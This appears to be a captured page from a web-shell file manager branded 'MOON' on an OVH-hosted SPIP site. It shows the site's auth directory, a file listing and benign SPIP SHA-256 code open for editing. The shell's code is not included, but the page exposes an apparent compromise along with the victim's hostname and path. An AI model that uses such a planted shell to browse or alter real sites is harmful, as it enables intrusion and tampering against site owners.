┌────────────────────────────────┐ │ ░░░ ░░▓ ░▓▓ ███ ▓▓░ ▓░░ │ │ ~ M O O N ~ │ └────────────────────────────────┘
webm008.cluster103.gra.hosting.ovh.net
LOCATION:
/home/paxmediccp/www/ecrire/auth
☗ ROOT
↻ REFRESH
✎ EDIT FILE
EDITING: sha256.inc.php
<?php /** * Main routine called from an application using this include. * * General usage: * require_once('sha256.inc.php'); * $hashstr = spip_sha256('abc'); * * @param string $str Chaîne dont on veut calculer le SHA * @return string Le SHA de la chaîne */ function spip_sha256($str) { return hash('sha256', $str); } /** * @param string $str Chaîne dont on veut calculer le SHA * @param bool $ig_func * @return string Le SHA de la chaîne * @deprecated 4.0 * @see spip_sha256() */ function _nano_sha256($str, $ig_func = true) { trigger_deprecation('spip', '4.0', 'Using "%s" is deprecated, use "%s" instead', __FUNCTION__, "hash('sha256', ...)"); return spip_sha256($str); }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 ldap.php
PHP
9.8 KB
2026-04-27 15:57
EDIT
📄 sha256.inc.php
PHP
702 B
2026-04-27 15:57
EDIT
📄 spip.php
PHP
17 KB
2026-04-27 15:57
EDIT